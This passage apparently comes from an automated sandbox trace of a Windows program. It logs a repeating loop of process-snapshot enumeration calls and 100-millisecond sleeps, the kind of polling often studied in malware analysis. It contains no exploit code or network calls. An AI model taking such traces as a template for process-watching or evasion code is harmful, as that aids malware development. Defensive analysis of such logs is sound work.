Process32First (in: hSnapshot=0x1da8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.231] Sleep (dwMilliseconds=0x64) [0276.234] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1da8 [0276.248] Process32First (in: hSnapshot=0x1da8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.312] Sleep (dwMilliseconds=0x64) [0276.314] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1da8 [0276.326] Process32First (in: hSnapshot=0x1da8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.428] Sleep (dwMilliseconds=0x64) [0276.433] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1da8 [0276.445] Process32First (in: hSnapshot=0x1da8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.600] Sleep (dwMilliseconds=0x64) [0276.602] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1da8 [0276.615] Process32First (in: hSnapshot=0x1da8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.678] Sleep (dwMilliseconds=0x64) [0276.682] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1da8 [0276.699] Process32First (in: hSnapshot=0x1da8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.764] Sleep (dwMilliseconds=0x64) [0276.766] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1da8 [0276.780] Process32First (in: hSnapshot=0x1da8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.843] Sleep (dwMilliseconds=0x64) [0276.845] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1da8 [0276.861] Process32First (in: hSnapshot=0x1da8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.956] Sleep (dwMilliseconds=0x64) [0276.996] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x748 [0277.016] Process32First (in: hSnapshot=0x748, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.084] Sleep (dwMilliseconds=0x64) [0277.085] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x748 [0277.095] Process32First (in: hSnapshot=0x748, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.149] Sleep (dwMilliseconds=0x64) [0277.151] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0277.198] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.264] Sleep (dwMilliseconds=0x64) [0277.267] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0277.279] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.344] Sleep (dwMilliseconds=0x64) [0277.346] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0277.356] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.417] Sleep (dwMilliseconds=0x64) [0277.421] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0277.431] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.492] Sleep (dwMilliseconds=0x64) [0277.493] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0277.503] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.563] Sleep (dwMilliseconds=0x64) [0277.565] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0277.574] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.624] Sleep (dwMilliseconds=0x64) [0277.627] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0277.637] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.686] Sleep (dwMilliseconds=0x64) [0277.688] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0277.697] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.430] Sleep (dwMilliseconds=0x64) [0280.445] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0280.456] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.559] Sleep (dwMilliseconds=0x64) [0280.566] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0280.579] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.632] Sleep (dwMilliseconds=0x64) [0280.635] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0280.650] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.708] Sleep (dwMilliseconds=0x64) [0280.712] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0280.730] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.787] Sleep (dwMilliseconds=0x64) [0280.794] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0280.812] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.882] Sleep (dwMilliseconds=0x64) [0280.884] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0280.897] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.960] Sleep (dwMilliseconds=0x64) [0280.962] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0280.977] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.038] Sleep (dwMilliseconds=0x64) [0281.040] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0281.054] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.121] Sleep (dwMilliseconds=0x64) [0281.123] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0281.141] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.205] Sleep (dwMilliseconds=0x64) [0281.208] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0281.222] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.288] Sleep (dwMilliseconds=0x64) [0281.291] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0281.316] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.377] Sleep (dwMilliseconds=0x64) [0281.380] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0281.393] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.460] Sleep (dwMilliseconds=0x64) [0281.465] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0281.482] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.634] Sleep (dwMilliseconds=0x64) [0281.647] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0281.660] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.731] Sleep (dwMilliseconds=0x64) [0281.748] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0281.761] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.851] Sleep (dwMilliseconds=0x64) [0281.855] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0281.878] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.949] Sleep (dwMilliseconds=0x64) [0281.952] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0281.966] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.030] Sleep (dwMilliseconds=0x64) [0282.033] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0282.055] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.120] Sleep (dwMilliseconds=0x64) [0282.123] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0282.136] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.200] Sleep (dwMilliseconds=0x64) [0282.201] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0282.216] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.280] Sleep (dwMilliseconds=0x64) [0282.283] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0282.314] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.380] Sleep (dwMilliseconds=0x64) [0282.383] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0282.396] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.475] Sleep (dwMilliseconds=0x64) [0282.477] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0282.490] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.558] Sleep (dwMilliseconds=0x64) [0282.560] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0282.574] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.638] Sleep (dwMilliseconds=0x64) [0282.641] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0282.654] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.719] Sleep (dwMilliseconds=0x64) [0282.720] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0282.731] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.809] Sleep (dwMilliseconds=0x64) [0282.813] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0282.828] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.919] Sleep (dwMilliseconds=0x64) [0282.921] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0282.942] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.015] Sleep (dwMilliseconds=0x64) [0283.036] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0283.050] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.121] Sleep (dwMilliseconds=0x64) [0283.123] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0283.134] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.201] Sleep (dwMilliseconds=0x64) [0283.204] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0283.219] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.290] Sleep (dwMilliseconds=0x64) [0283.293] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0283.339] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.406] Sleep (dwMilliseconds=0x64) [0283.410] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0283.428] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.491] Sleep (dwMilliseconds=0x64) [0283.503] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0283.518] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.603] Sleep (dwMilliseconds=0x64) [0283.607] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0283.619] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.691] Sleep (dwMilliseconds=0x64) [0283.697] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0283.724] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.806] Sleep (dwMilliseconds=0x64) [0283.810] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0283.832] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.907] Sleep (dwMilliseconds=0x64) [0283.909] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0283.922] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.987] Sleep (dwMilliseconds=0x64) [0283.989] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0284.003] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.066] Sleep (dwMilliseconds=0x64) [0284.068] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0284.079] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.182] Sleep (dwMilliseconds=0x64) [0284.186] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0284.211] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.289] Sleep (dwMilliseconds=0x64) [0284.292] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0284.323] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.400] 